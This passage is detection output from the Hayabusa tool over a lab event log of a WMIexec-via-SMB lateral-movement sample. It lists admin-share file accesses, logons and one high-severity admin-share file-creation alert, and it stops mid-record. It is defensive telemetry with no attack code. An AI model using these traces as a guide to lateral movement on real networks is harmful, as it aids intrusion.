Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c318,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 